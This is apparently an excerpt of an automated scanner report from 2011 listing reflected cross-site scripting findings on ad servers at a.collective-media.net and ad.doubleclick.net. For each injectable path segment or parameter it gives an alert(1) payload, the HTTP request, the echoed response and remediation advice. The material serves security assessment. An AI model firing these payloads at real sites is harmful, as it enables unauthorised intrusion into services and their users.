function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... 6073,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=b11b4'-alert(1)-'a0b31f3de82;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg= ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a1e8'-alert(1)-'36cbf08e36e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:41 GMT Connection: close Content-Length: 7647
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-9346846_1296266081","http://ad.doubleclick.net/adj4a1e8'-alert(1)-'36cbf08e36e/q1.bosherald/ent;net=q1;u=,q1-9346846_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm. ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4d68'-alert(1)-'439fb269440 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:42 GMT Connection: close Content-Length: 7641
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-38929048_1296266082","http://ad.doubleclick.net/adj/q1.bosheraldb4d68'-alert(1)-'439fb269440/ent;net=q1;u=,q1-38929048_1296266082,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.s ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b712c'-alert(1)-'5c1810d0077 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:43 GMT Connection: close Content-Length: 7641
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-65781663_1296266083","http://ad.doubleclick.net/adj/q1.bosherald/entb712c'-alert(1)-'5c1810d0077;net=q1;u=,q1-65781663_1296266083,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sport ...[SNIP]...
4.68. http://a.collective-media.net/cmadj/q1.bosherald/ent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/q1.bosherald/ent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a882'-alert(1)-'a42b4e4a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/ent?2a882'-alert(1)-'a42b4e4a6b3=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7586 Date: Sat, 29 Jan 2011 05:19:39 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-31506867_1296278379","http://ad.doubleclick.net//q1.bosherald/ent?2a882'-alert(1)-'a42b4e4a6b3=1;net=q1;u=,q1-31506867_1296278379,11d765b6a10b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sp ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb091'-alert(1)-'152f5176ca5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:35 GMT Connection: close Content-Length: 7614
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... 6075,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=fb091'-alert(1)-'152f5176ca5;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg= ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1fa1'-alert(1)-'99ecf593489 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:40 GMT Connection: close Content-Length: 7652
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-20932346_1296266080","http://ad.doubleclick.net/adjb1fa1'-alert(1)-'99ecf593489/q1.bosherald/ent_fr;net=q1;u=,q1-20932346_1296266080,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8 ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a16d'-alert(1)-'c6afe39cbf2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:41 GMT Connection: close Content-Length: 7644
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-85902019_1296266081","http://ad.doubleclick.net/adj/q1.bosherald2a16d'-alert(1)-'c6afe39cbf2/ent_fr;net=q1;u=,q1-85902019_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-c ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 525dc'-alert(1)-'e67344382a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:41 GMT Connection: close Content-Length: 7644
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-54367927_1296266081","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr525dc'-alert(1)-'e67344382a2;net=q1;u=,q1-54367927_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sport ...[SNIP]...
4.73. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/q1.bosherald/ent_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b55c'-alert(1)-'61ca1119251 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/q1.bosherald/ent_fr?5b55c'-alert(1)-'61ca1119251=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7589 Date: Sat, 29 Jan 2011 05:19:37 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-52945228_1296278377","http://ad.doubleclick.net//q1.bosherald/ent_fr?5b55c'-alert(1)-'61ca1119251=1;net=q1;u=,q1-52945228_1296278377,11d765b6a10b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sp ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27bc0'-alert(1)-'5df599feb72 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:33 GMT Connection: close Content-Length: 7619
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... 6073,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=27bc0'-alert(1)-'5df599feb72;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg= ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab2ef'-alert(1)-'63371fe5300 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:46 GMT Connection: close Content-Length: 7828
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-5182855_1296266086","http://ad.doubleclick.net/adjab2ef'-alert(1)-'63371fe5300/uol.collective/ColeHaan_MM_Openness_CMN_13109;net=uol;u=,uol-5182855_1296266086,11d765b6a10b1b3,ent,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.r ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 577b8'-alert(1)-'80d1667b19e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:46 GMT Connection: close Content-Length: 7822
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-45286728_1296266086","http://ad.doubleclick.net/adj/uol.collective577b8'-alert(1)-'80d1667b19e/ColeHaan_MM_Openness_CMN_13109;net=uol;u=,uol-45286728_1296266086,11d765b6a10b1b3,ent,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_ ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9d04'-alert(1)-'7d08933297b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:47 GMT Connection: close Content-Length: 7822
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-16390671_1296266087","http://ad.doubleclick.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109b9d04'-alert(1)-'7d08933297b;net=uol;u=,uol-16390671_1296266087,11d765b6a10b1b3,ent,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-c ...[SNIP]...
The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 919b4'-alert(1)-'321da0909a2 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:54:38 GMT Connection: close Content-Length: 7768
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;dcove=919b4'-alert(1)-'321da0909a2;contx=none;dc=w;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;bt ...[SNIP]...
4.79. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e086f'-alert(1)-'c94bc7b20f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109?e086f'-alert(1)-'c94bc7b20f7=1 HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7761 Date: Sat, 29 Jan 2011 05:19:40 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-57677525_1296278380","http://ad.doubleclick.net//uol.collective/ColeHaan_MM_Openness_CMN_13109?e086f'-alert(1)-'c94bc7b20f7=1;net=uol;u=,uol-57677525_1296278380,11d765b6a10b1b3,none,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfa ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de995"-alert(1)-"613dfd0b404 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0de995"-alert(1)-"613dfd0b404&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:22 GMT Expires: Sat, 29 Jan 2011 05:20:22 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0de995"-alert(1)-"613dfd0b404&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFound = false; v ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee1bd'-alert(1)-'3c2321e8777 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0ee1bd'-alert(1)-'3c2321e8777&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:23 GMT Expires: Sat, 29 Jan 2011 05:20:23 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0ee1bd'-alert(1)-'3c2321e8777&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
